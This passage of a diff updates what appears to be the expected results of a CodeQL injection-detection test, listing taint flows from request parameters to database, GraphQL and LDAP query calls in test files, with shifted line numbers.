user-provided value | -| graphql.js:27:30:27:40 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:27:30:27:40 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:30:32:30:42 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:30:32:30:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:33:18:33:28 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:33:18:33:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:44:14:44:24 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:44:14:44:24 | `foo ${id}` | This query string depends on a $@. | graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:48:44:48:54 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:48:44:48:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:56:39:56:49 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:56:39:56:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:58:66:58:76 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:58:66:58:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | graphql.js:74:14:74:25 | req.query.id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:84:14:90:8 | `{\\n ... }` | graphql.js:74:14:74:25 | req.query.id | graphql.js:84:14:90:8 | `{\\n ... }` | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:120:38:120:48 | `foo ${id}` | graphql.js:119:16:119:28 | req.params.id | graphql.js:120:38:120:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:119:16:119:28 | req.params.id | user-provided value | +| graphql.js:9:34:19:5 | ` // $ ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:9:34:19:5 | ` // $ ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | +| graphql.js:26:30:26:40 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:26:30:26:40 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:29:32:29:42 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:29:32:29:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:32:18:32:28 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:32:18:32:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:43:14:43:24 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:43:14:43:24 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:47:44:47:54 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:47:44:47:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:55:39:55:49 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:55:39:55:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:57:66:57:76 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:57:66:57:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | graphql.js:73:14:73:25 | req.query.id | graphql.js:74:46:74:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:82:14:88:8 | `{ // $ ... }` | graphql.js:73:14:73:25 | req.query.id | graphql.js:82:14:88:8 | `{ // $ ... }` | This query string depends on a $@. | graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:118:38:118:48 | `foo ${id}` | graphql.js:117:16:117:28 | req.params.id | graphql.js:118:38:118:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:117:16:117:28 | req.params.id | user-provided value | | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | This query string depends on a $@. | html-sanitizer.js:13:39:13:44 | param1 | user-provided value | | json-schema-validator.js:33:22:33:26 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:33:22:33:26 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | | json-schema-validator.js:35:18:35:22 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:35:18:35:22 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | @@ -650,67 +650,67 @@ subpaths | ldap.js:32:5:32:61 | { filte ... e}))` } | ldap.js:20:21:20:27 | req.url | ldap.js:32:5:32:61 | { filte ... e}))` } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | | ldap.js:66:30:66:53 | { filte ... ilter } | ldap.js:20:21:20:27 | req.url | ldap.js:66:30:66:53 | { filte ... ilter } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | | ldap.js:68:27:68:42 | `cn=${username}` | ldap.js:20:21:20:27 | req.url | ldap.js:68:27:68:42 | `cn=${username}` | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| marsdb-flow-to.js:14:17:14:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:14:17:14:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | -| marsdb.js:16:12:16:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:16:12:16:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | -| minimongo.js:18:12:18:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:18:12:18:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | -| mongodb.js:18:16:18:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:18:16:18:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | -| mongodb.js:32:18:32:45 | { title ... itle) } | mongodb.js:26:19:26:26 | req.body | mongodb.js:32:18:32:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:26:19:26:26 | req.body | user-provided value | -| mongodb.js:54:16:54:20 | query | mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | This query object depends on a $@. | mongodb.js:49:19:49:33 | req.query.title | user-provided value | -| mongodb.js:65:12:65:16 | query | mongodb.js:60:16:60:30 | req.query.title | mongodb.js:65:12:65:16 | query | This query object depends on a $@. | mongodb.js:60:16:60:30 | req.query.title | user-provided value | -| mongodb.js:77:14:77:26 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:77:14:77:26 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:85:12:85:24 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:85:12:85:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:112:14:112:18 | query | mongodb.js:107:17:107:29 | queries.title | mongodb.js:112:14:112:18 | query | This query object depends on a $@. | mongodb.js:107:17:107:29 | queries.title | user-provided value | -| mongodb_bodySafe.js:29:16:29:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:29:16:29:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | -| mongoose.js:24:21:24:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:24:21:24:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:27:17:27:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:17:27:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:30:22:30:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:30:22:30:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:33:21:33:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:21:33:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:36:28:36:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:36:28:36:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:39:16:39:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:16:39:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:42:19:42:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:42:19:42:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:45:28:45:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:28:45:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:48:28:48:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:48:28:48:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:51:28:51:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:28:51:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:54:22:54:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:22:54:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:57:18:57:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:18:57:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:60:22:60:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:22:60:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:63:21:63:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:21:63:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:65:32:65:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:65:32:65:36 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:67:27:67:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:67:27:67:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:68:8:68:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:8:68:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:71:17:71:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:17:71:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:72:10:72:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:72:10:72:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:73:8:73:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:8:73:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:74:7:74:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:74:7:74:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:75:16:75:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:16:75:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:77:10:77:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:77:10:77:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| marsdb-flow-to.js:13:17:13:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:13:17:13:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | +| marsdb.js:15:12:15:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:15:12:15:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | +| minimongo.js:17:12:17:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:17:12:17:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | +| mongodb.js:17:16:17:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:17:16:17:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | +| mongodb.js:30:18:30:45 | { title ... itle) } | mongodb.js:25:19:25:26 | req.body | mongodb.js:30:18:30:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:25:19:25:26 | req.body | user-provided value | +| mongodb.js:51:16:51:20 | query | mongodb.js:47:19:47:33 | req.query.title | mongodb.js:51:16:51:20 | query | This query object depends on a $@. | mongodb.js:47:19:47:33 | req.query.title | user-provided value | +| mongodb.js:61:12:61:16 | query | mongodb.js:57:16:57:30 | req.query.title | mongodb.js:61:12:61:16 | query | This query object depends on a $@. | mongodb.js:57:16:57:30 | req.query.title | user-provided value | +| mongodb.js:72:14:72:26 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:72:14:72:26 | { tags: tag } | This query object depends on a $@. | mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:79:12:79:24 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:79:12:79:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:105:14:105:18 | query | mongodb.js:101:17:101:29 | queries.title | mongodb.js:105:14:105:18 | query | This query object depends on a $@. | mongodb.js:101:17:101:29 | queries.title | user-provided value | +| mongodb_bodySafe.js:28:16:28:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:28:16:28:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | +| mongoose.js:23:21:23:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:23:21:23:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:25:17:25:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:25:17:25:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:27:22:27:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:22:27:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:29:21:29:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:29:21:29:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:31:28:31:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:31:28:31:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:33:16:33:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:16:33:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:35:19:35:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:35:19:35:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:37:28:37:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:37:28:37:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:39:28:39:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:28:39:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:41:28:41:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:41:28:41:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:43:22:43:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:43:22:43:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:45:18:45:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:18:45:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:47:22:47:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:47:22:47:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:49:21:49:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:49:21:49:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:51:32:51:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:32:51:36 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:53:27:53:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:53:27:53:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:54:8:54:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:8:54:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:57:17:57:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:17:57:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:58:10:58:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:58:10:58:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:59:8:59:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:59:8:59:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:60:7:60:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:7:60:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:61:16:61:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:61:16:61:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:63:10:63:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:10:63:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:68:46:68:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:46:68:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:69:47:69:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:69:47:69:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:71:46:71:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:46:71:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:73:51:73:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:51:73:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:75:46:75:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:46:75:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:78:46:78:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:78:46:78:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:80:51:80:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:80:51:80:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | | mongoose.js:82:46:82:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:82:46:82:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:83:47:83:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:83:47:83:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:85:46:85:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:85:46:85:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:87:51:87:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:87:51:87:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:89:46:89:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:89:46:89:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:92:46:92:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:92:46:92:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:94:51:94:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:94:51:94:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:96:46:96:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:96:46:96:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:111:14:111:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:111:14:111:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:113:31:113:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:113:31:113:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:116:22:116:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:116:22:116:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:117:21:117:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:117:21:117:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:118:21:118:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:118:21:118:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:119:18:119:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:119:18:119:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:120:22:120:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:120:22:120:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:121:16:121:19 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:121:16:121:19 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:122:19:122:22 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:122:19:122:22 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:123:20:123:21 | id | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:123:20:123:21 | id | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:124:28:124:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:124:28:124:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:125:28:125:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:125:28:125:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:126:28:126:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:126:28:126:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:127:18:127:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:127:18:127:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:128:22:128:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:128:22:128:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:129:21:129:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:129:21:129:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:130:16:130:26 | { _id: id } | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:130:16:130:26 | { _id: id } | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:136:30:136:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:136:30:136:34 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongooseJsonParse.js:23:19:23:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:23:19:23:23 | query | This query object depends on a $@. | mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | +| mongoose.js:97:14:97:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:97:14:97:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:99:31:99:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:99:31:99:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:102:22:102:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:102:22:102:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:103:21:103:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:103:21:103:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:104:21:104:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:104:21:104:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:105:18:105:21 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:105:18:105:21 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:106:22:106:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:106:22:106:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:107:16:107:19 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:107:16:107:19 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:108:19:108:22 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:108:19:108:22 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:109:20:109:21 | id | mongoose.js:101:11:101:22 | req.query.id | mongoose.js:109:20:109:21 | id | This query object depends on a $@. | mongoose.js:101:11:101:22 | req.query.id | user-provided value | +| mongoose.js:110:28:110:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:110:28:110:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:111:28:111:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:111:28:111:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:112:28:112:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:112:28:112:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:113:18:113:21 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:113:18:113:21 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:114:22:114:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:114:22:114:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:115:21:115:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:115:21:115:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:116:16:116:26 | { _id: id } | mongoose.js:101:11:101:22 | req.query.id | mongoose.js:116:16:116:26 | { _id: id } | This query object depends on a $@. | mongoose.js:101:11:101:22 | req.query.id | user-provided value | +| mongoose.js:122:30:122:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:122:30:122:34 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongooseJsonParse.js:22:19:22:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:22:19:22:23 | query | This query object depends on a $@. | 